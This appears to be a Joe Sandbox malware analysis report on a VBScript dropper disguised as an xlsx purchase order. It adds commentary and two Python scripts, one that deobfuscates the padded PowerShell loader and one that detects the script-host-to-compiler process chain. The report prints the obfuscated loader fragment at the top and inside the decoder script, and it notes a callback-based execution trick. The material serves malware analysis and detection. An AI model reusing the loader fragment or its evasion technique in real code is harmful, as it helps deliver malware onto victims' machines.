GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
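The command line handed to powershell.exe above is not encoded, only padded: two junk characters sit in front of every real character, so the script is the 3rd, 6th, 9th ... character of the string. Stripping that padding from the prefix the report shows yields `Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]...`, which is exactly the start of the `ksa1shoc.0.cs` source that csc.exe later compiled (see the dropped-file preview further down). The following script is an added example written for this page, not part of the Joe Sandbox report or of the sample; it embeds the verbatim prefix of the recorded command line, recovers the PowerShell/C# text, lists the P/Invoke declarations, and includes a stride-guessing helper (my own heuristic, not something the report describes) for variants that change the junk ratio.

```python
import re
from typing import List, Optional, Tuple

# Prefix of the obfuscated PowerShell command line recorded in this report
# (the value assigned to $Saudiarabiske), copied verbatim from the report.
OBFUSCATED_PREFIX = '''KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;'''

JUNK_PERIOD = 3     # every real character is preceded by two junk characters,
PAYLOAD_OFFSET = 2  # so the payload occupies string positions 2, 5, 8, ...


def strip_junk(obfuscated: str, period: int = JUNK_PERIOD,
               offset: int = PAYLOAD_OFFSET) -> str:
    """Keep every `period`-th character starting at `offset`."""
    return obfuscated[offset::period]


def unescape_powershell_quotes(script: str) -> str:
    """The recovered text is PowerShell source that lived inside a double-quoted
    string, where `" is an escaped double quote (the tripled quotes in the report
    are the same quote after the cmd.exe quoting round-trip). Dropping the
    backtick gives the C# exactly as csc.exe received it."""
    return script.replace('`"', '"')


def recover_script(obfuscated: str) -> str:
    return unescape_powershell_quotes(strip_junk(obfuscated))


# [DllImport("dll")]public static extern <ret> <name>(   -- one P/Invoke declaration
DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"\)\]\s*public static extern \w+ (?P<func>\w+)\(')


def imported_apis(csharp: str) -> List[Tuple[str, str]]:
    """Return (dll, function) pairs declared via [DllImport] in recovered C#."""
    return [(m.group("dll").lower(), m.group("func"))
            for m in DLLIMPORT_RE.finditer(csharp)]


def guess_stride(obfuscated: str, max_period: int = 5) -> Optional[Tuple[int, int]]:
    """Heuristic (assumption, not from the report): try every (period, offset)
    and keep the one whose extracted text contains the most expected PowerShell
    and C# tokens. Returns None when no candidate matches anything."""
    tokens = ("Add-Type", "using System", "DllImport", "public static")
    best = None
    for period in range(2, max_period + 1):
        for offset in range(period):
            score = sum(tok in obfuscated[offset::period] for tok in tokens)
            if score and (best is None or score > best[0]):
                best = (score, period, offset)
    return None if best is None else (best[1], best[2])


if __name__ == "__main__":
    text = recover_script(OBFUSCATED_PREFIX)
    print("stride guess:", guess_stride(OBFUSCATED_PREFIX))
    print(text)
    for dll, func in imported_apis(text):
        print(f"  P/Invoke {dll}!{func}")
```

Run it against the full command line (the report truncates it) to get the whole `Thwartness1` class and the rest of the script. The decoy-heavy P/Invoke list in the dropped source (GetServiceKeyName, GetClipRgn, GlobalDeleteAtom, ScheduleJob, ...) is typical padding; the one declaration worth following up is `EnumSystemLocalesW(uint v1, int v2)`, whose first argument is a callback pointer, a common way to transfer execution into a buffer. The timed-out run recorded no such call, so that remains a lead rather than a finding.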
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll  VolumeInformation (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll  VolumeInformation (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation (2 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat  VolumeInformation (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll  VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll  VolumeInformation
Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography  MachineGuid
MITRE ATT&CK matrix, listed per tactic. The small numeric badges the matrix shows in front of a technique are kept in brackets after it; techniques without a badge are the matrix's standard cells and were not flagged for this sample.
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
  • Execution: Command and Scripting Interpreter [2 1]; Scripting [4 2 1]; PowerShell [1]; At (Windows); Cron; Launchd
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
  • Privilege Escalation: Process Injection [1 1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
  • Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [2 1]; Process Injection [1 1]; Deobfuscate/Decode Files or Information [1]; Scripting [4 2 1]; Obfuscated Files or Information [1]
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
  • Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [2 1]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [1 2]
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
  • Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
  • Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
  • Impact: Modify System Partition; Device Lockout; Delete Device Data
Behavior graph (ID 755440, sample PO-09784893 xlsx.vbs, start date 28/11/2022, architecture WINDOWS, score 84)
Sample-level signatures: Malicious sample detected (through community Yara rule); Sigma detected: Dot net compiler compiles file from suspicious location; Potential malicious VBS script found (suspicious strings); Potential evasive VBS script found (use of timer() function in loop)
Process tree:
  wscript.exe (started)
    signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
    -> powershell.exe (started); drops C:\Users\user\AppData\...\ksa1shoc.cmdline (Unicode)
       -> csc.exe (started); drops C:\Users\user\AppData\Local\...\ksa1shoc.dll (PE32)
          -> cvtres.exe (started)
       -> conhost.exe (started)
    -> cmd.exe (started)
       -> conhost.exe (started)
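The process tree above is the part of this report that transfers best into detection logic: a script host (wscript.exe) spawning powershell.exe, which in turn spawns csc.exe with a response file under the user's %TEMP%. The following Python is an added example written for this page, not code from Joe Sandbox or from the Sigma project; it approximates the idea behind the "Dot net compiler compiles file from suspicious location" signature and adds the parent/grandparent lineage that separates this chain from an administrator typing Add-Type at an interactive prompt. The event records are constructed from the command lines shown in this report; the PIDs for wscript.exe, cmd.exe and conhost.exe are the report's, the others (and the explorer.exe parent) are placeholders, and the rule names are mine.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (what Sysmon event 1 or a 4688 would carry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# Compiler input or response file under the user's local temp directory.
USER_TEMP = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(by_pid: Dict[int, ProcessEvent], pid: int) -> List[str]:
    """Image names from the process itself up to the oldest ancestor we know about."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names


def detect(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) findings for the given process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        chain = lineage(by_pid, e.pid)          # chain[0] is the process itself
        name, parent = chain[0], chain[1] if len(chain) > 1 else ""
        if name == "powershell.exe" and parent in SCRIPT_HOSTS:
            findings.append((e.pid, "script_host_spawns_powershell"))
        if name in DOTNET_COMPILERS and USER_TEMP.search(e.cmdline):
            # Noisy on its own: every Add-Type -TypeDefinition in an interactive
            # session compiles through csc.exe out of %TEMP% as well.
            findings.append((e.pid, "dotnet_compiler_input_from_user_temp"))
            if parent == "powershell.exe" and SCRIPT_HOSTS & set(chain[2:]):
                findings.append((e.pid, "script_host_powershell_compiler_chain"))
    return findings


# Constructed from this report's process tree; see the lead-in for which
# PIDs are real and which are placeholders. The PowerShell argument is cut short.
SAMPLE_EVENTS = [
    ProcessEvent(4180, 1234, r"C:\Windows\System32\wscript.exe",
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"'),
    ProcessEvent(5132, 4180, r"C:\Windows\System32\cmd.exe", r"CMD.EXE /c echo C:\Windows"),
    ProcessEvent(2860, 5132, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(6000, 4180, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r'C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh (truncated)'),
    ProcessEvent(6100, 6000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
                 r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline'),
    ProcessEvent(6200, 6100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
                 r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"'),
]

# Constructed benign control: an interactive Add-Type from an explorer-launched
# shell also drives csc.exe out of %TEMP%, but there is no script host above it.
BENIGN_EVENTS = [
    ProcessEvent(800, 700, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(810, 800, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile"),
    ProcessEvent(820, 810, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
                 r'csc.exe /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\abc\abc.cmdline"'),
]

if __name__ == "__main__":
    for label, events in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(label, detect(events))
```

The temp-path rule alone fires once on the benign set, which is why the chain rule exists: the combination "script host above PowerShell above csc.exe" is what this report actually evidences, and it is rare in legitimate administration.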

Antivirus detection (Source | Detection | Scanner | Label | Link)
  • PO-09784893 xlsx.vbs | 2% | ReversingLabs | |
  • Dropped files: No Antivirus matches
  • Unpacked PE files: No Antivirus matches
  • Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label | Link)
  • http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
  • http://crl.microsoft.co | 0% | URL Reputation | safe
  • https://contoso.com/ | 0% | URL Reputation | safe (listed twice)
  • https://contoso.com/License | 0% | URL Reputation | safe (listed twice)
  • https://contoso.com/Icon | 0% | URL Reputation | safe
No contacted domains info
URL strings found in process memory (Name | Source | Malicious | Antivirus Detection | Reputation)
  • http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp | false | | high
  • http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  • http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
  • http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp | false | | high
  • http://crl.microsoft.co | powershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
  • https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp | false | | high
  • https://contoso.com/ | powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (2 hits) | unknown
  • https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp | false | | high
  • https://contoso.com/License | powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (2 hits) | unknown
  • https://contoso.com/Icon | powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
None of these URLs belong to the sample: they are strings from PowerShell's own module metadata resident in powershell.exe (the Pester and PowerShellGet manifests, the contoso.com example URIs in PowerShellGet's module-manifest documentation, and a truncated Microsoft CRL URL), and the report records no network activity at all. Do not carry them into an indicator list.
            No contacted IP infos
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:755440
            Start date and time:2022-11-28 17:57:22 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:PO-09784893 xlsx.vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal84.expl.evad.winVBS@11/9@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 33
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com
• Not all processes were analysed; the report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:59:51 | API Interceptor | 33x Sleep call for process: powershell.exe modified
No context (IPs, domains, ASNs, JA3 fingerprints, dropped files)
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):8003
            Entropy (8bit):4.839308921501875
            Encrypted:false
            SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
            MD5:937C6E940577634844311E349BD4614D
            SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
            SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
            SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
            Malicious:false
            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:57 2022, 1st section name ".debug$S"
            Category:dropped
            Size (bytes):1332
            Entropy (8bit):3.9766442806584554
            Encrypted:false
            SSDEEP:24:HUzW9NJRNHFhKPfwI+ycuZhN8lyakSllTPNnq92d:jJzTKPo1ul9a3hq9G
            MD5:5A4E00CCACE5868AAA337F3EBCEC8BC5
            SHA1:D076A269B89250F6A8F7A16140E866D112796096
            SHA-256:99989AA5805EB86F0F91D5A1B602F1BBF667672A75313947CFC406B255FCA582
            SHA-512:24F366131F0B896823E44B5AA8143C8ECFB240600F8A4869E17EDB52BDBC2FCFE57BA52CCFC23EB41356B6259A2F98BFB627D47B3D84DE37268706669CCED9B6
            Malicious:false
            Preview:L....g.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP....................[..m..|...$:............5.......C:\Users\user\AppData\Local\Temp\RES41DE.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:MSVC .res
            Category:dropped
            Size (bytes):652
            Entropy (8bit):3.096275784221629
            Encrypted:false
            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grymlHSak7YnqqllHzPN5Dlq5J:+RI+ycuZhN8lyakSllTPNnqX
            MD5:C61B5BAAD76D0DD77CF4A2E8243A1413
            SHA1:CFC6184E06A84CE1252FA7E6C1C7F8E210889947
            SHA-256:74B5220AC3B0ABFEB55A34615BB7A17651B0BC6B717FFF5A6312C315A88C11FE
            SHA-512:1B2A771C8766717B046C70446C89228283C70BB7025A3B4FEB421234E5B7E176B8A356573D2B489D5356921896895B36ACFD3148030B35F67110ACFAD855340C
            Malicious:false
            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1330), with no line terminators
            Category:dropped
            Size (bytes):1333
            Entropy (8bit):5.039121039231445
            Encrypted:false
            SSDEEP:24:JVS3UwgVcVn1pl65/6f8cwM2sVS86mCVmuWyBeFcwXQ:JVAngyVn1pl65/6EPYpaVmry0FPXQ
